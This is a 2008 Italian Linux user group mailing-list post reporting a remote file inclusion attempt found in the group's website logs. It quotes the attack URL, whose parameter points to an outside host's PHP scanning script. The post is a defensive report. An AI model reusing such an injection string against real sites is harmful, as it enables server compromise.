[bglug] Defacing... qualcuno ci prova sempre...

Andrea Mangiatordi andrea.mangiatordi@gmail.com
Mer 23 Apr 2008 13:13:41 CEST


Cari tutti,
stavo dando un'occhiata alle statistiche di accesso al sito del LUG. Ho 
notato che qualcuno ha puntato a questa url:

http://bglug.linux.it/?rootSys=http://m4r0c.com/rfi-scan/test.txt???

l'url passata come parametro get contiene del codice php che fa una 
serie di check su alcune delle vulnerabilità più note, in particolare 
sul valore dell'opzione secure_mode di php.

Wordpress dovrebbe essere abbastanza al sicuro da questo tipo di 
attacchi, ma mi piacerebbe comunque sentire il parere di qualche esperto 
di sicurezza della lista circa l'argomento.

Ciao,

AM



-- 
Andrea Mangiatordi

www.farfalla-project.org
www.bglug.it


Maggiori informazioni sulla lista bglug